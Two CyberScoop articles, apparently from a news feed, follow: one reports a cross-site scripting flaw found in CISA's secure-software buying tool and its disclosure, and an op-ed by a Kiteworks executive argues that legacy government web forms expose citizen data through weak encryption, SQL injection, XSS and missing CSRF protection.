A Cybersecurity and Infrastructure Security Agency tool dedicated to helping government agencies buy secure software turned out to have a cybersecurity vulnerability of its own.

Jeff Williams, the former leader of the Open Worldwide Application Security Project (OWASP), told CyberScoop that he discovered a cross-site scripting vulnerability in CISA’s “Software Acquisition Guide: Supplier Response Web Tool” and reported it to CISA in September, before it was eventually fixed in December.

The vulnerability involves attackers injecting JavaScript into a web page, then getting that JavaScript to attack other users of that same page, he said. It also could have been used to deface the website, he said.

Williams, co-founder and chief technology officer of the application security firm Contrast Security, said it should have been easy for someone to spot the vulnerability at CISA, since it was the first attack he tried.

“I thought it was a little hypocritical to be promoting secure software development and not do the most basic test you could possibly do,” he said.

When Williams first reported the flaw through a bug bounty program, they rejected it as not critical enough, but he later got attention to the flaw from CISA’s Vulnerability Information and Coordination Environment program. The government shutdown contributed to the delay in fixing it, but Williams said it should’ve been just five minutes of work.

Williams said that while there are worse bugs than the one he uncovered, “I have customers that would treat this vulnerability as incredibly serious, because they take their reputation to be one of their most important assets.”

CISA’s role as an evangelist for cybersecurity hasn’t made it immune to cyberattacks. Notably, the agency identified a breach in 2024 that triggered a notification to Congress.

The chief information officer for CISA, Robert Costello, said the agency took action after receiving notification about a potential vulnerability.

“As per protocol, we addressed and patched the vulnerability, ensuring there was no significant risk or known exploitation,” he said in a statement to CyberScoop. “Additionally, our team identified process improvements for future vulnerabilities reported to the agency. As a champion for the CVE [Common Vulnerabilities and Exposures] program, CISA followed the standard coordinated disclosure processes to create a CVE that documents the vulnerability. CISA appreciates the report provided by this security researcher. This is another example of operational collaboration in action.”

The post CISA’s secure-software buying tool had a simple XSS vulnerability of its own appeared first on CyberScoop.

Federal, state, and local government agencies face a critical vulnerability hiding in plain sight: outdated web forms collecting citizen data through insecure channels. While agencies invest in perimeter security and threat detection, many continue using legacy forms built years ago without modern encryption, authentication, or compliance capabilities. These aging systems collect Social Security numbers, financial records, health information, and security clearance data through technology that cannot meet current federal security standards.

The scope of the problem is substantial. Government agencies allocate 80% of IT budgets to maintaining legacy systems, starving modernization efforts while feeding outdated technology. The federal government’s 10 most critical legacy systems—ranging from 8 to 51 years old—cost $337 million annually to operate and maintain, with total projected spending on legacy systems reaching $2.4 billion by 2030. Meanwhile, government data breaches cost an average of $10.22 million per incident in the United States—the highest globally.

The HTTPS problem that won’t go away

Despite the 2015 federal mandate establishing HTTPS as the baseline for all government websites, implementation gaps persist. The unencrypted HTTP protocol exposes data to interception, manipulation, and impersonation attacks. Attackers positioned on the network can read Social Security numbers, driver’s license numbers, financial account numbers, and login credentials transmitted in plain text. Man-in-the-middle attackers can alter form data during transmission without detection.

Recent federal security assessments reveal ongoing challenges. The Department of Health and Human Services’ information security program rated “Not Effective” for FY 2024—the same rating as FY 2023—based on inability to meet maturity levels for core security functions including Identify, Protect, Detect, Respond, and Recover.

Legacy government web forms that do implement encryption often use outdated protocols that no longer meet regulatory requirements. Older systems rely on SHA-1 hashing and TLS 1.0, which are vulnerable to known exploits and don’t meet NIST, CJIS, or HIPAA requirements. Without HTTP Strict Transport Security enforcement, browsers don’t automatically use secure connections, allowing users to access unencrypted form pages.

Application-layer vulnerabilities

Beyond transmission security, legacy web forms suffer from fundamental application vulnerabilities that modern platforms address in their design. Testing of government web applications revealed that more than 80% are prone to SQL injection attacks. Unlike private sector organizations that remediate 73% of identified vulnerabilities, government departments remediate only 27%—the lowest among all industry sectors.

SQL injection remains one of the most dangerous attacks against government web forms. Legacy forms that construct database queries using string concatenation, rather than employing parameterized queries, introduce serious vulnerabilities. This insecure practice allows attackers to inject malicious SQL code, potentially gaining unauthorized access to sensitive data such as National Identity information, license details, and Social Security numbers. Attackers can exploit these vulnerabilities to alter or delete user identity records, manipulate data to forge official documents, and even exfiltrate entire databases containing citizen information. The continued use of string concatenation in query construction exposes critical government systems to significant risks.

Cross-site scripting (XSS) affects 75% of government applications compared to other industry sectors. XSS attacks on government web forms enable attackers to directly manipulate users’ browsers, capture keystrokes to steal credentials and form data, obtain session cookies to hijack authenticated sessions, and redirect users to malicious websites. Government healthcare application forms are particularly vulnerable, where XSS could enable altering medical information to create fake prescriptions.

Legacy forms also lack protection against cross-site request forgery attacks (CSRF), which trick authenticated government users into performing unwanted actions without their knowledge. Modern secure forms implement unique, unpredictable anti-CSRF tokens for each session, validating them server-side before processing requests. Legacy forms lack this protection entirely.

Compliance gap

Federal agencies must comply with the Federal Information Security Modernization Act (FISMA), which requires implementation of NIST SP 800-53 security controls including access control, configuration management, identification and authentication, and system and communications protection. Legacy web forms fail FISMA compliance when they cannot implement modern encryption for data in transit and at rest, lack multi-factor authentication capabilities, don’t maintain comprehensive audit logs, use unsupported software without security patches, and operate with known exploitable vulnerabilities.

The Treasury Inspector General for Tax Administration (TIGTA) found IRS platforms exhibit insufficient vulnerability scanning and remediation, inadequate configuration controls, and systems lacking modern protection capabilities. Critical and high vulnerabilities on IRS servers ranged from days to months overdue for remediation, with applications requiring protection lacking proper safeguards.

Federal agencies using third-party web form platforms must ensure these vendors have appropriate FedRAMP authorization. FedRAMP requires security controls compliance incorporating NIST SP 800-53 Revision 5 controls, impact level authorization based on data sensitivity, and continuous monitoring of encryption methods and security posture. Legacy government web forms implemented through non-FedRAMP-authorized platforms, consumer-grade SaaS tools, or on-premises systems without proper security assessments represent unauthorized use of non-compliant systems.

All 50 states have data breach notification laws requiring organizations to notify affected individuals when personally identifiable information is compromised. Legacy web forms create notification violations through inability to detect breaches, unknown breach scope without audit trails, missed notification deadlines, and unclear encryption status that affects notification exemptions.

Real-world transmission failures

The gap between policy and practice is stark. Federal agencies including GSA, DoD, and DOE labs require contractors to submit forms with Social Security numbers, dates of birth, driver’s license numbers, criminal histories, and credit information via standard non-encrypted email as plain PDF attachments. When contractors offer encrypted alternatives like Microsoft OME, password-protected files, or secure links, badge offices respond with “That’s how we’ve always done it and that’s the only way we’ll do it.”

Most federal agencies lack basic secure portals for PII submission, forcing reliance on email despite DoD and GSA policies requiring PII transmitted outside internal mail systems to be encrypted. Standard Form 86 for national security clearances and other government forms are distributed as fillable PDFs that can be completed offline, saved unencrypted, and transmitted through insecure channels—despite containing complete background investigation data for millions of federal employees and contractors.

Recent breaches highlight ongoing vulnerabilities in government data systems. The U.S. Treasury Department suffered a 2024 breach when hackers accessed its unclassified network through a compromised software key, exposing internal documents about U.S. financial operations. Earlier this month, the Congressional Budget Office was hacked by a suspected foreign actor, potentially exposing key financial research. DISA Global Solutions, a Texas-based provider of employee screening services including background checks, confirmed in February 2025 a massive data breach affecting more than 3.3 million people, exposing Social Security numbers, financial information, and government-issued identity documents—with unauthorized access lasting over two months before detection.

Tax forms pose significant security risks because many IRS applications are extremely outdated—some over 60 years old and written in COBOL and Assembler. A recent report found 231 IRS IT systems are legacy systems with critical security vulnerabilities. Web forms collecting taxpayer PII including Social Security numbers, income details, banking information, and tax filings are transmitted through these vulnerable legacy platforms.

What agencies must do now

Government agencies must immediately enforce HTTPS encryption for all web form pages using HSTS, deploy server-side input validation to prevent SQL injection and XSS attacks, implement anti-CSRF tokens for each form session, add CAPTCHA and bot protection, enable comprehensive access logging, and conduct regular vulnerability scanning for OWASP Top 10 vulnerabilities.

Long-term security requires replacing legacy forms with FedRAMP-authorized platforms that provide end-to-end encryption using AES-256 for data at rest and TLS 1.3 for data in transit, multi-factor authentication for both citizens and government staff, role-based access control with granular permissions, comprehensive audit trails capturing all data access events, automated security updates addressing emerging vulnerabilities, and digital workflow automation eliminating manual processes.

Agencies should also consolidate forms into centralized platforms rather than managing dozens of disconnected form tools, creating unified security policies, consistent user experiences, and simplified compliance management.

The real question is not whether government agencies can afford to modernize outdated web forms, but whether they can afford the consequences of failing to do so. Every unencrypted submission, each SQL injection vulnerability, and each missing audit trail represents citizen data at risk and regulatory violations accumulating. Federal mandates established the security standards years ago. Implementation can no longer wait.

Frank Balonis is chief information security officer and senior vice president of operations and support at Kiteworks, with more than 20 years of experience in IT support and services.

Update, 11/23/2025, 2:20 p.m.: This op-ed incorrectly described the way the state of Washington’s MFA system operated. We regret the error.

The post Legacy web forms are the weakest link in government data security appeared first on CyberScoop.